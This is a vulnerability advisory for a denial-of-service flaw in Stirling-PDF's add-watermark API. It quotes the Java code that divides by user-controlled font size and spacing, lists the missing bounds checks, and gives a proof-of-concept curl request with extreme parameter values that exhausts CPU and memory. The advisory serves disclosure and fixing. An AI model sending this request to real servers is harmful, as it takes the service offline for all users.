Summary

A critical Denial of Service (DoS) vulnerability has been identified in the Stirling-PDF watermark functionality (/api/v1/security/add-watermark endpoint). The vulnerability allows authenticated users to cause resource exhaustion and server crashes by providing extreme values for the fontSize and widthSpacer parameters.

Vulnerability Details

Root Cause

The addTextWatermark() method in WatermarkController.java (lines 229-269) calculates the number of watermark repetitions based on user-controlled parameters without proper validation:

// Vulnerable code snippet
float watermarkWidth = widthSpacer + maxLineWidth * fontSize / 1000;
float watermarkHeight = heightSpacer + fontSize * textLines.length;

// ...

float newWatermarkWidth = (float) (Math.abs(watermarkWidth * Math.cos(radians)) 
                                   + Math.abs(watermarkHeight * Math.sin(radians)));
float newWatermarkHeight = (float) (Math.abs(watermarkWidth * Math.sin(radians)) 
                                    + Math.abs(watermarkHeight * Math.cos(radians)));

// Division by potentially zero or near-zero values
int watermarkRows = (int) (pageHeight / newWatermarkHeight + 1);
int watermarkCols = (int) (pageWidth / newWatermarkWidth + 1);

// Nested loop creating O(watermarkRows * watermarkCols) operations
for (int i = 0; i <= watermarkRows; i++) {
    for (int j = 0; j <= watermarkCols; j++) {
        // PDF rendering operations
    }
}

Attack Vectors

1. Division by Near-Zero: When fontSize is set to extremely small values (e.g., 0.00000001), newWatermarkHeight becomes near-zero, causing watermarkRows to become astronomically large (millions or billions).

2. Zero Division: When widthSpacer is 0 and fontSize approaches zero, newWatermarkWidth becomes near-zero, causing watermarkCols to explode similarly.

3. Multiplication Overflow: When both watermarkRows and watermarkCols are extremely large, the nested loop performs O(n²) operations, each involving expensive PDF rendering operations (contentStream.beginText(), contentStream.setTextMatrix(), etc.).

Impact

• Resource Exhaustion: CPU and memory consumption spike to 100% (add 1GO to RAM by request)
• Service Unavailability: Complete DoS affecting all users

Proof of Concept

Exploit Code

curl -X POST "http://localhost:8080/api/v1/security/add-watermark" \         
  -H "Authorization: Bearer <YOUR_TOKEN>" \
  -F "fileInput=@/exemple.pdf" \  // random pdf
  -F "watermarkType=text" \
  -F "watermarkText=TEST_WATERMARK" \
  -F "fontSize=0.00000001" \
  -F "rotation=0" \
  -F "opacity=0.5" \
  -F "widthSpacer=0" \
  -F "heightSpacer=0" \
  -F "alphabet=roman" \
  -F "customColor=#d3d3d3" \
  -F "convertPDFToImage=false" \
  --output result_watermarked.pdf

Technical Analysis

Affected Code Location

File: app/core/src/main/java/stirling/software/SPDF/controller/api/security/WatermarkController.java
Method: addTextWatermark()
Lines: 229-269

Vulnerable Calculations

// Line 229-230: User input directly used without bounds checking
float watermarkWidth = widthSpacer + maxLineWidth * fontSize / 1000;
float watermarkHeight = heightSpacer + fontSize * textLines.length;

// Line 247-248: Division can result in astronomical numbers
int watermarkRows = (int) (pageHeight / newWatermarkHeight + 1);
int watermarkCols = (int) (pageWidth / newWatermarkWidth + 1);

Missing Validations

1. No minimum bounds for fontSize (allows values ≤ 0)
2. No maximum bounds for widthSpacer/heightSpacer (allows extreme values)
3. No sanity check on calculated watermarkRows/watermarkCols before loop execution